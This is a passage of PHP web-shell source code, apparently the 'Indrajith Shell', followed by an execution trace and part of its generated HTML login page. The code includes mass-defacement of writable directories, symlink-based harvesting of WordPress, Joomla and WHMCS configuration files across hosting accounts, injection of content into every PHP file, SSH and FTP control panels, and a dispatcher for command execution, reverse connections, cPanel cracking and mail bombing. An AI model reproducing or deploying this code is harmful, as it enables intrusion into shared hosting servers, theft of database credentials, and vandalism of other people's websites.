echo "<div id=result><center><h2>Mass Deface</h2><hr /><br /><br /><table class=tbl><form method='GET'><input name='mm_path' type='hidden' value=" . $_GET['path'] . "><tr><td>Name : <input size=40 name='mass_name'></td></tr>\r\n <tr><td><textarea name='mass_cont' cols=80 rows=25 class='textarea_edit'></textarea></td></tr><tr><td><input class='input_big' type=submit value=' >> ' /></td></tr></form></table><br /><br /><hr /><br /><br /></div>";
}
function mass_deface_bg()
{
global $sep;
$d_path = $_GET['mm_path'];
chdir($d_path);
$d_file = $_GET['mass_name'];
$d_conten = $_GET['mass_cont'];
if (is_dir($d_path)) {
chdir($d_path);
$d_dirs = array();
if ($handle = opendir($d_path)) {
while (($item = readdir($handle)) !== FALSE) {
if ($item == ".") {
continue;
}
if ($item == "..") {
continue;
}
if (is_dir($item)) {
array_push($d_dirs, $item);
}
}
}
}
echo "<div id=result><center><h2>Result</h2></center><hr /><br /><br /><table class=tbl>";
foreach ($d_dirs as $d_dir) {
$xd_path = getcwd() . "{$sep}{$d_dir}{$sep}{$d_file}";
if (is_writable($d_dir)) {
$handle = fopen($xd_path, "wb");
if ($handle) {
fwrite($handle, $d_conten);
}
}
echo "<tr><td><font color=green>{$xd_path}</font></td></tr>";
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
function symlinkg($usernamexx, $domainxx)
{
symlink('/home/' . $usernamexx . '/public_html/vb/includes/config.php', 'Indrajith/' . $domainxx . ' =>vBulletin1.txt');
symlink('/home/' . $usernamexx . '/public_html/includes/config.php', 'Indrajith/' . $domainxx . ' =>vBulletin2.txt');
symlink('/home/' . $usernamexx . '/public_html/forum/includes/config.php', 'Indrajith/' . $domainxx . ' =>vBulletin3.txt');
symlink('/home/' . $usernamexx . '/public_html/cc/includes/config.php', 'Indrajith/' . $domainxx . ' =>vBulletin4.txt');
symlink('/home/' . $usernamexx . '/public_html/inc/config.php', 'Indrajith/' . $domainxx . ' =>mybb.txt');
symlink('/home/' . $usernamexx . '/public_html/config.php', 'Indrajith/' . $domainxx . ' =>Phpbb1.txt');
symlink('/home/' . $usernamexx . '/public_html/forum/includes/config.php', 'Indrajith/' . $domainxx . ' =>Phpbb2.txt');
symlink('/home/' . $usernamexx . '/public_html/wp-config.php', 'Indrajith/' . $domainxx . ' =>Wordpress1.txt');
symlink('/home/' . $usernamexx . '/public_html/blog/wp-config.php', 'Indrajith/' . $domainxx . ' =>Wordpress2.txt');
symlink('/home/' . $usernamexx . '/public_html/configuration.php', 'Indrajith/' . $domainxx . ' =>Joomla1.txt');
symlink('/home/' . $usernamexx . '/public_html/blog/configuration.php', 'Indrajith/' . $domainxx . ' =>Joomla2.txt');
symlink('/home/' . $usernamexx . '/public_html/joomla/configuration.php', 'Indrajith/' . $domainxx . ' =>Joomla3.txt');
symlink('/home/' . $usernamexx . '/public_html/whm/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm1.txt');
symlink('/home/' . $usernamexx . '/public_html/whmc/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm2.txt');
symlink('/home/' . $usernamexx . '/public_html/support/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm3.txt');
symlink('/home/' . $usernamexx . '/public_html/client/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm4.txt');
symlink('/home/' . $usernamexx . '/public_html/billings/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm5.txt');
symlink('/home/' . $usernamexx . '/public_html/billing/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm6.txt');
symlink('/home/' . $usernamexx . '/public_html/clients/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm7.txt');
symlink('/home/' . $usernamexx . '/public_html/whmcs/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm8.txt');
symlink('/home/' . $usernamexx . '/public_html/order/configuration.php', 'Indrajith/' . $domainxx . ' =>Whm9.txt');
symlink('/home/' . $usernamexx . '/public_html/admin/conf.php', 'Indrajith/' . $domainxx . ' =>5.txt');
symlink('/home/' . $usernamexx . '/public_html/admin/config.php', 'Indrajith/' . $domainxx . ' =>4.txt');
symlink('/home/' . $usernamexx . '/public_html/conf_global.php', 'Indrajith/' . $domainxx . ' =>invisio.txt');
symlink('/home/' . $usernamexx . '/public_html/include/db.php', 'Indrajith/' . $domainxx . ' =>7.txt');
symlink('/home/' . $usernamexx . '/public_html/connect.php', 'Indrajith/' . $domainxx . ' =>8.txt');
symlink('/home/' . $usernamexx . '/public_html/mk_conf.php', 'Indrajith/' . $domainxx . ' =>mk-portale1.txt');
symlink('/home/' . $usernamexx . '/public_html/include/config.php', 'Indrajith/' . $domainxx . ' =>12.txt');
symlink('/home/' . $usernamexx . '/public_html/settings.php', 'Indrajith/' . $domainxx . ' =>Smf.txt');
symlink('/home/' . $usernamexx . '/public_html/includes/functions.php', 'Indrajith/' . $domainxx . ' =>phpbb3.txt');
symlink('/home/' . $usernamexx . '/public_html/include/db.php', 'Indrajith/' . $domainxx . ' =>infinity.txt');
}
function config_grabber_bg()
{
global $sym_htaccess, $sym_php_ini;
mkdir('INDRAJITH', 0777);
symlink("/", "INDRAJITH/root");
$htaccess = fopen('INDRAJITH/.htaccess', 'wb');
fwrite($htaccess, $sym_htaccess);
$php_ini_x = fopen('INDRAJITH/php.ini', 'wb');
fwrite($php_ini_x, $sym_php_ini);
$usr = explode("\n", $_POST['user_z_list']);
foreach ($usr as $uzer) {
$u_er = trim($uzer);
symlinggg($u_er);
}
echo "<script>window.open('INDRAJITH/', '_blank');</script>";
alert('Config Grab compted. Check configs in direcory INDRAJITH');
}
if (isset($_POST['user_z_list'])) {
config_grabber_bg();
}
function config_grabber_ui()
{
if (file('/etc/passwd')) {
?><script>alert("/etc/named.conf Not Found, Its alternative method.");</script><div id=result><center><h2>Config Grabber</h2><hr /><br /><br /><table class=tbl><form method=POST><tr><td><textarea spellcheck=false class='textarea_edit' rows=15 cols=60 name=user_z_list><?php
$users = file('/etc/passwd');
foreach ($users as $user) {
$user = explode(':', $user);
echo $user[0] . "\n";
}
?></textarea></td></tr><tr><td><input type='submit' class='input_big' value=' >> '/></td></tr></form></table><br /><br /><hr /><br /><br /><hr /></div><?php
} else {
alert(" File Not Found : /etc/passwd ");
}
}
function symlinggg($user)
{
symlink('/home/' . $usernamexx . '/public_html/blog/configuration.php', "INDRAJITH/" . $user . " =>blog/configuration.php");
symlink('/home/' . $user . '/public_html/forum/includes/config.php', "INDRAJITH/" . $user . " =>forum/includes/config.php");
symlink("/home/" . $user . "/public_html/wp-config.php", "INDRAJITH/" . $user . " =>wp-config.php");
symlink("/home/" . $user . "/public_html/wordpress/wp-config.php", "INDRAJITH/" . $user . " =>wordpress/wp-config.php");
symlink("/home/" . $user . "/public_html/configuration.php", "INDRAJITH/" . $user . " =>configuration.php");
symlink("/home/" . $user . "/public_html/blog/wp-config.php", "INDRAJITH/" . $user . " =>blog/wp-config.php");
symlink("/home/" . $user . "/public_html/joomla/configuration.php", "INDRAJITH/" . $user . " =>joomla/configuration.php");
symlink("/home/" . $user . "/public_html/vb/includes/config.php", "INDRAJITH/" . $user . " =>vb/includes/config.php");
symlink("/home/" . $user . "/public_html/includes/config.php", "INDRAJITH/" . $user . " =>includes/config.php");
symlink("/home/" . $user . "/public_html/conf_global.php", "INDRAJITH/" . $user . " =>conf_global.php");
symlink("/home/" . $user . "/public_html/inc/config.php", "INDRAJITH/" . $user . " =>inc/config.php");
symlink("/home/" . $user . "/public_html/config.php", "INDRAJITH/" . $user . " =>config.php");
symlink("/home/" . $user . "/public_html/Settings.php", "INDRAJITH/" . $user . " =>/Settings.php");
symlink("/home/" . $user . "/public_html/sites/default/settings.php", "INDRAJITH/" . $user . " =>sites/default/settings.php");
symlink("/home/" . $user . "/public_html/whm/configuration.php", "INDRAJITH/" . $user . " =>whm/configuration.php");
symlink("/home/" . $user . "/public_html/whmcs/configuration.php", "INDRAJITH/" . $user . " =>whmcs/configuration.php");
symlink("/home/" . $user . "/public_html/support/configuration.php", "INDRAJITH/" . $user . " =>support/configuration.php");
symlink("/home/" . $user . "/public_html/whmc/WHM/configuration.php", "INDRAJITH/" . $user . " =>whmc/WHM/configuration.php");
symlink("/home/" . $user . "/public_html/whm/WHMCS/configuration.php", "INDRAJITH/" . $user . " =>whm/WHMCS/configuration.php");
symlink("/home/" . $user . "/public_html/whm/whmcs/configuration.php", "INDRAJITH/" . $user . " =>whm/whmcs/configuration.php");
symlink("/home/" . $user . "/public_html/support/configuration.php", "INDRAJITH/" . $user . " =>support/configuration.php");
symlink("/home/" . $user . "/public_html/clients/configuration.php", "INDRAJITH/" . $user . " =>clients/configuration.php");
symlink("/home/" . $user . "/public_html/client/configuration.php", "INDRAJITH/" . $user . " =>client/configuration.php");
symlink("/home/" . $user . "/public_html/clientes/configuration.php", "INDRAJITH/" . $user . " =>clientes/configuration.php");
symlink("/home/" . $user . "/public_html/cliente/configuration.php", "INDRAJITH/" . $user . " =>cliente/configuration.php");
symlink("/home/" . $user . "/public_html/clientsupport/configuration.php", "INDRAJITH/" . $user . " =>clientsupport/configuration.php");
symlink("/home/" . $user . "/public_html/billing/configuration.php", "INDRAJITH/" . $user . " =>billing/configuration.php");
symlink("/home/" . $user . "/public_html/admin/config.php", "INDRAJITH/" . $user . " =>admin/config.php");
}
function sym_xxx()
{
global $sym_htaccess, $sym_php_ini;
mkdir('Indrajith', 0777);
symlink("/", "Indrajith/root");
$htaccess = @fopen('Indrajith/.htaccess', 'w');
fwrite($htaccess, $sym_htaccess);
$php_ini_x = fopen('Indrajith/php.ini', 'w');
fwrite($php_ini_x, $sym_php_ini);
$akps = implode(file("/etc/named.conf"));
if (!$akps) {
config_grabber_ui();
} else {
$usrd = array();
foreach ($akps as $akp) {
if (eregi("zone", $akp)) {
preg_match_all('#zone "(.*)" #', $akp, $akpzz);
flush();
if (strlen(trim($akpzz[1][0])) > 2) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
symlinkg($akpzz[1][0], $user['name']);
flush();
}
}
}
}
}
function sym_link()
{
global $sym_htaccess, $sym_php_ini;
cmd('rm -rf AKP');
mkdir('AKP', 0755);
$usrd = array();
$akps = implode(file("/etc/named.conf"));
$htaccess = fopen('AKP/.htaccess', 'w');
fwrite($htaccess, $sym_htaccess);
$php_ini_x = fopen('AKP/php.ini', 'w');
fwrite($php_ini_x, $sym_php_ini);
symlink("/", "AKP/root");
if (!$file) {
echo "<script>alert('Bind File /etc/passwd Not Found. Its alternative Method')</script>";
echo "<div id=result><center><h2>SymLink</h2></center><hr /><br /><br /><table class='table'><tr><th>Users</th><th>Exploit</th></tr>";
$users = file('/etc/passwd');
foreach ($users as $user) {
$user = explode(':', $user);
echo "<tr><td>" . $user[0] . "</td><td><a href='AKP/root/home/" . $user[0] . "/public_html/' target=_blank>SymLink</tr>";
}
echo "</table><br /><br /><hr /><br /><br /></div>";
} else {
echo "<table class=table><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
foreach ($akps as $akp) {
if (eregi("zone", $akp)) {
preg_match_all('#zone "(.*)" #', $akp, $akpzz);
flush();
if (strlen(trim($akpzz[1][0])) > 2) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $akpzz[1][0]));
echo "<tr><td><a href=http://www." . $akpzz[1][0] . " target=_blank>" . $akpzz[1][0] . "</a><td>" . $user['name'] . "</td><td><a href='AKP/root/home/" . $user['name'] . "/public_html/' target=_blank>SymLink</a></td></tr></table>";
flush();
}
}
}
}
}
function shell_finder_ui()
{
echo "<div id=result><center><h2>SH3LL SCANNER</h2><hr /><br /><br /><br /><form method='GET'>URL : <input size=50 name='sh311_scanx' value='http://www.ajithkp560.hostei.com/PHP/'><input type='submit' value=' >> ' /></form><br /><br /><hr /><br /><br />";
}
function shell_finder_bg()
{
$sh_url = $_GET['sh311_scanx'];
echo "<div id=result><center><h2>SHELL SCAN</h2><hr /><br /><br /><table class='table'>";
$ShellZ = array("indrajith.php", "c99.php", "c100.php", "r57.php", "b374k.php", "c22.php", "sym.php", "symlink_sa.php", "r00t.php", "webr00t.php", "sql.php", "cpanel.php", "wso.php", "404.php", "aarya.php", "greenshell.php", "ddos.php", "madspot.php", "1337.php", "31337.php", "WSO.php", "dz.php", "cpn.php", "sh3ll.php", "mysql.php", "killer.php", "cgishell.pl", "dz0.php", "whcms.php", "vb.php", "gaza.php", "d0mains.php", "changeall.php", "h4x0r.php", "L3b.php", "uploads.php", "shell.asp", "cmd.asp", "sh3ll.asp", "b374k-2.2.php", "m1n1.php", "b374km1n1.php");
foreach ($ShellZ as $shell) {
$urlzzx = $sh_url . $shell;
if (function_exists('curl_init')) {
echo "<tr><td style='text-align:left'><font color=orange>Checking : </font> <font color=7171C6> {$urlzzx} </font></td>";
$ch = curl_init($urlzzx);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($status_code == 200) {
echo "<td style='text-align:left'><font color=green> Found....</font></td></tr>";
} else {
echo "<td style='text-align:left'><font color=red>Not Found...</font></td></tr>";
}
} else {
echo "<font color=red>cURL Not Found </font>";
break;
}
}
echo "</table><br /><br /><hr /><br /><br /></div>";
}
function code_in_ui()
{
global $sep;
$mode = $_POST['modexxx'];
$ftype = $_POST['ffttype'];
$c_cont = $_POST['code_cont'];
$ppp = $_POST['path'];
if (isset($_POST['modexxx']) && isset($_POST['path']) && isset($_POST['ffttype']) && isset($_POST['code_cont']) && $mode != "" && $ftype != "" && $c_cont != "" && $ppp != "") {
echo "<div id=result><center><h2>Successfully c0d3 inj3cted</h2></center><table class=tbl>";
switch ($mode) {
case "Apender":
$mmode = "a";
break;
case "Rewrite":
$mmode = "w";
break;
}
if ($handle = opendir($ppp)) {
while (($c_file = readdir($handle)) !== False) {
if (preg_match("/{$ftype}" . '$' . '/', $c_file, $matches) != 0 && preg_match('/' . $c_file . '$/', $self, $matches) != 1) {
echo "<tr><td><font color=red>{$ppp}{$sep}{$c_file}</font></td></tr>";
$fd = fopen($ppp . $sep . $c_file, $mmode);
if ($fd) {
fwrite($fd, $c_cont);
} else {
alert("Error. Access Denied");
}
}
}
}
echo "</table><br /><br /><hr /><br /><br /></div>";
} else {
?>
<div id=result><center><h2>c0de inj3ct</h2></center><hr /><br /><br /><table class=table><form method='POST'><input type='hidden' name='path' value="<?php
echo getcwd();
?>"><tr><td>Mode : </td>
<td><select style='color:green; background-color:black; border:1px solid #666;' name='modexxx'><option>Apender</option><option>Rewrite</option></select></td></tr><tr><td>File Type</td><td><input name='ffttype' value='.php' size=50></td></tr>
<tr><td>Content : </td><td><textarea name='code_cont' rows=20 cols=60 class='textarea_edit'></textarea></td></tr><tr><td></td><td><input type=submit value=' >> ' class='input_big' /></td></tr></form></table><br /><br /><hr /><br /><br />
<?php
}
}
function ssh_man_ui()
{
?>
<div id=result><center><h2>SSH Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ssh_host'></td></tr><tr><td>Username : </td><td><input size=50 name='ssh_user'></td></tr><tr><td>Password : </td><td><input size=50 name='ssh_pass'></td></tr><tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
<?php
}
function ssh_man_bg()
{
$ssh_h = $_GET['ssh_host'];
$ssh_u = $_GET['ssh_user'];
$ssh_p = $_GET['ssh_pass'];
if (!function_exists('ssh2_connect')) {
alert("Sorry, Function ssh2_connect is not found");
}
$conn = ssh2_connect($ssh_h, 22);
if (!$conn) {
alert("SSH Host Not Found");
}
$log = ssh2_auth_password($conn, $ssh_u, $ssh_p);
if (!$log) {
alert("SSH Authorication failed");
}
$shell = ssh2_shell($conn, "bash");
if ($_GET['ssh_cmd'] != "" && $_GET['ssh_cmd']) {
$ssh_cmd = $_GET['ssh_cmd'];
fwrite($shell, $ssh_cmd);
sleep(1);
while ($line = fgets($shell)) {
flush();
echo $line . "\n";
}
?>
<div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
<form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
<?php
} else {
?>
<div id=result><center><h2>SSH Shell by Indrajith Shell</h2><hr /><br /><br /><textarea class='textarea_edit' rows=20 cols=60></textarea>
<form method='GET'>CMD : <input name='ssh_cmd' size=60><input type='submit' value=' >> ' /></form></center><br /><br /><hr /><br /><br /></div>
<?php
}
}
function ftp_man_ui()
{
?>
<div id=result><center><h2>FTP Manager</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td>HOST : </td><td><input size=50 name='ftp_host'></td></tr>
<tr><td>Username : </td><td><input size=50 name='ftp_user'></td></tr>
<tr><td>Password : </td><td><input size=50 name='ftp_pass'></td></tr>
<tr><td>Path [<font color=red>Optional</font>] : </td><td><input name='fpath' size=50></td></tr>
<tr><td>Upload File From Server [<font color=red>Optional</font>] : </td><td><input name='upload_file' size=50></td></tr>
<tr><td>Download File To Server [<font color=red>Optional</font>] : </td><td><input name='download_file' size=50></td></tr>
<tr><td></td><td><input type='submit' value=' >> ' /></form></table></center><br /><br /><hr /><br /><br /></div>
<?php
}
function ftp_man_bg()
{
echo "<div id=result><center><h2>FTP FILEMANAGER</h2></center><hr />";
$fhost = $_GET['ftp_host'];
$fuser = $_GET['ftp_user'];
$fpass = $_GET['ftp_pass'];
$fpath = $_GET['fpath'];
$upl = $_GET['upload_file'];
$down = $_GET['download_file'];
if ($fpath == "") {
$fpath = ftp_pwd($conn);
}
$conn = ftp_connect($fhost);
if (!$conn) {
alert("FTP Host Not Found!!!");
}
$log = ftp_login($conn, $fuser, $fpass);
if (!$log) {
alert("FTP Authorication Failed");
}
if ($upl != "") {
$fp = fopen($upl, 'r');
if (ftp_fput($conn, $upl, $fp, FTP_ASCII)) {
echo "<center><font color=green>Successfully uploaded <font color=red> {$upl} </font> </font></center>";
} else {
echo "<center><font color=red>There was a problem while uploading <font color=green> {$upl} </font> </font></center>";
}
}
if ($down != "") {
$handle = fopen($down, 'w');
if (ftp_fget($conn, $handle, $down, FTP_ASCII, 0)) {
echo "<center><font color=green>successfully written to <font color=red> {$down} </font> </font></center>";
} else {
echo "<center><font color=red>There was a problem while downloading <font color=green> {$down} </font> to <font color=green> {$down} </font> </font></center>";
}
}
echo "<table class='table'><tr><th>Files</th>";
ftp_chdir($fpath);
$list = ftp_rawlist($conn, $fpath);
foreach ($list as $fff) {
echo "<tr><td><pre>{$fff}</pre></td></tr>";
}
echo "</table></div>";
}
//////////////////////////////// Frond End Calls ///////////////////////////////
if (isset($_POST['e_file']) && isset($_POST['e_content_n'])) {
edit_file_bg();
} else {
if (isset($_REQUEST['sh311_scanner'])) {
shell_finder_ui();
} else {
if (isset($_REQUEST['ftp_host']) && isset($_REQUEST['ftp_user']) && isset($_REQUEST['ftp_pass'])) {
ftp_man_bg();
} else {
if (isset($_REQUEST['ftpman'])) {
ftp_man_ui();
} else {
if (isset($_GET['ssh_host']) && isset($_GET['ssh_user']) && isset($_GET['ssh_pass'])) {
ssh_man_bg();
} else {
if (isset($_REQUEST['sshman'])) {
ssh_man_ui();
} else {
if (isset($_REQUEST['c0de_inject']) && isset($_REQUEST['path'])) {
chdir($_GET['path']);
code_in_ui();
} else {
if (isset($_GET['sh311_scanx'])) {
shell_finder_bg();
} else {
if (isset($_REQUEST['config_grab'])) {
sym_xxx();
} else {
if (isset($_REQUEST['ftp_man'])) {
ftp_man_ui();
} else {
if (isset($_REQUEST['mass_xploit'])) {
mass_deface_ui();
} else {
if (isset($_GET['f_host']) && isset($_GET['f_user']) && isset($_GET['f_pass'])) {
ftp_man_bg();
} else {
if (isset($_GET['mass_name']) && isset($_GET['mass_cont'])) {
mass_deface_bg();
} else {
if (isset($_REQUEST['ftp_anon_scan'])) {
ftp_anonymous_ui();
} else {
if (isset($_GET['ftp_anonz'])) {
ftp_anonymous_bg();
} else {
if (isset($_REQUEST['killme'])) {
killme();
} else {
if (isset($_REQUEST['hexenc'])) {
hex_encode_ui();
} else {
if (isset($_REQUEST['remotefiledown'])) {
remote_download_ui();
} else {
if (isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path'])) {
remote_download_bg();
} else {
if (isset($_REQUEST['cpanel_crack'])) {
cpanel_crack();
} else {
if (isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz'])) {
remote_file_check_bg();
} else {
if (isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content'])) {
php_ende_bg();
} else {
if (isset($_REQUEST['remote_server_scan'])) {
remote_file_check_ui();
} else {
if (isset($_REQUEST['server_exploit_details'])) {
exploit_details();
} else {
if (isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content'])) {
massmailer_bg();
} else {
if (isset($_REQUEST['mysqlman'])) {
mysqlman();
} else {
if (isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content'])) {
mailbomb_bg();
} else {
if (isset($_REQUEST['cookiejack'])) {
cookie_jack();
} else {
if (isset($_REQUEST['massmailer'])) {
massmailer_ui();
} else {
if (isset($_REQUEST['rename'])) {
chdir($_GET['path']);
rename_ui();
} else {
if (isset($_GET['old_name']) && isset($_GET['new_name'])) {
chdir($_GET['path']);
rename_bg();
} else {
if (isset($_REQUEST['encodefile'])) {
php_ende_ui();
} else {
if (isset($_REQUEST['edit'])) {
edit_file();
} else {
if (isset($_REQUEST['down']) && isset($_REQUEST['path'])) {
download();
} else {
if (isset($_REQUEST['gzip']) && isset($_REQUEST['path'])) {
download_gzip();
} else {
if (isset($_REQUEST['read'])) {
chdir($_GET['path']);
code_viewer();
} else {
if (isset($_REQUEST['perm'])) {
chdir($_GET['path']);
ch_perm_ui();
} else {
if (isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm'])) {
chdir($_GET['path']);
ch_perm_bg();
} else {
if (isset($_REQUEST['del_fil'])) {
chdir($_GET['path']);
delete_file();
exit;
} else {
if (isset($_REQUEST['phpinfo'])) {
chdir($_GET['path']);
ob_clean();
echo phpinfo();
exit;
} else {
if (isset($_REQUEST['del_dir'])) {
chdir($_GET['path']);
$d_dir = $_GET['del_dir'];
deldirs($d_dir);
} else {
if (isset($_GET['path']) && isset($_GET['new_file'])) {
chdir($_GET['path']);
mk_file_ui();
} else {
if (isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content'])) {
mk_file_bg();
} else {
if (isset($_GET['path']) && isset($_GET['new_dir'])) {
chdir($_GET['path']);
create_dir();
} else {
if (isset($_GET['path']) && isset($_GET['cmdexe'])) {
chdir($_GET['path']);
cmd();
} else {
if (isset($_POST['upload_f']) && isset($_POST['path'])) {
upload_file();
} else {
if (isset($_REQUEST['rs'])) {
reverse_conn_ui();
} else {
if (isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port'])) {
reverse_conn_bg();
} else {
if (isset($_REQUEST['safe_mod']) && isset($_REQUEST['path'])) {
chdir($_GET['path']);
safe_mode_fuck_ui();
} else {
if (isset($_GET['path']) && isset($_GET['safe_mode'])) {
safe_mode_fuck();
} else {
if (isset($_GET['path']) && isset($_REQUEST['forbd_dir'])) {
AccessDenied();
} else {
if (isset($_REQUEST['symlink'])) {
sym_link();
} else {
if (isset($_GET['path']) && isset($_GET['copy'])) {
copy_file_ui();
} else {
if (isset($_GET['c_file']) && isset($_GET['c_target']) && isset($_GET['cn_name'])) {
copy_file_bg();
} else {
filemanager_bg();
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
echo "</div><div id=result><center><p><table class='tbl'>\r\n <tr><td><form method='GET'>PWD : <input size='50' name='path' value=" . getcwd() . "><input type='submit' value=' >> ' /></form></td></tr></table>\r\n <table class='tbl'><tr>\r\n <td><form style='float:right;' method='GET'><input name='path' value=" . getcwd() . " type=hidden><span> New File : </span><input type='submit' value=' >> ' ><input size='40' name='new_file' /></form>\r\n </td>\r\n <td><form style='float:left;' method='GET'><input name='path' value=" . getcwd() . " type=hidden><input size='40' name='new_dir'><input type='submit' value=' >> ' /><span> : New Dir</span></form>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td><form style='float:right;' method='GET'><input style='float:left;' name='path' value=" . getcwd() . " type=hidden><span>CMD : </span><input type='submit' value=' >> ' ><input name='cmdexe' size='40' /></form>\r\n </td>\r\n <td><form style='float:left;' method='POST' enctype=\"multipart/form-data\"><input name='path' value=" . getcwd() . " type=hidden><input size='27' name='upload_f' type='file'><input type='submit' name='upload_f' value=' >> ' /><span> : Upload File</span></form>\r\n </td>\r\n </tr>\r\n </table></p><p><font size=4 color=green>© <a style='color:green; text-decoration:none;' href=http://facebook.com/ajithkp560>AJITH KP</a> & <a style='color:green; text-decoration:none;' href='http://www.facebook.com/vishnunathkp'>VISHNU NATH KP</a> ©</font><br />® TOF [2012] ®</div>";
?> Execution traces
data/traces/b55f5aa0d9948b5214aac73783d51de3_trace-1676245495.236.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:45:21.133851]
1 0 1 0.000195 393512
1 3 0 0.002372 867392 {main} 1 /var/www/html/uploads/mndry.php 0 0
1 A /var/www/html/uploads/mndry.php 16 $username = 'ajithkp560'
1 A /var/www/html/uploads/mndry.php 17 $password = 'ajithkp560'
1 A /var/www/html/uploads/mndry.php 18 $email = 'ajithkp560@gmail.com'
2 4 0 0.002447 867392 error_reporting 0 /var/www/html/uploads/mndry.php 22 1 4
2 4 1 0.002462 867432
2 4 R 0
1 A /var/www/html/uploads/mndry.php 27 $userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
2 5 0 0.002496 867392 implode 0 /var/www/html/uploads/mndry.php 28 2 '|' [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler']
2 5 1 0.002517 867536
2 5 R 'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler'
2 6 0 0.002535 867472 preg_match 0 /var/www/html/uploads/mndry.php 28 2 '/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler/i' 'python-requests/2.25.1'
2 6 1 0.002554 867536
2 6 R 0
2 7 0 0.002580 867504 md5 0 /var/www/html/uploads/mndry.php 82 1 'ajithkp560'
2 7 1 0.002597 867600
2 7 R '38a692c8cfdd0c98bde3da5725ea2a38'
0.002639 788248
TRACE END [2023-02-12 21:45:21.136332]
Generated HTML code
<html><head><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><link href="data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw==" rel="icon" type="image/x-icon"><style>
html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
#loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
loginbox td { border-radius:5px; font-size:11px; }
.header { size:25px; color:green; }
h1 { font-family:DigifaceWide; color:green; font-size:200%; }
h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
.go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
.input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
hr { border:1px solid #222222; }
#meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
#meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
#meunlist li { margin: 0px; padding: 0px; display: inline; }
#meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
#meunlist a:hover { background: #333; color:green; }
.menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; }
.menu { font-size:25px; color: }
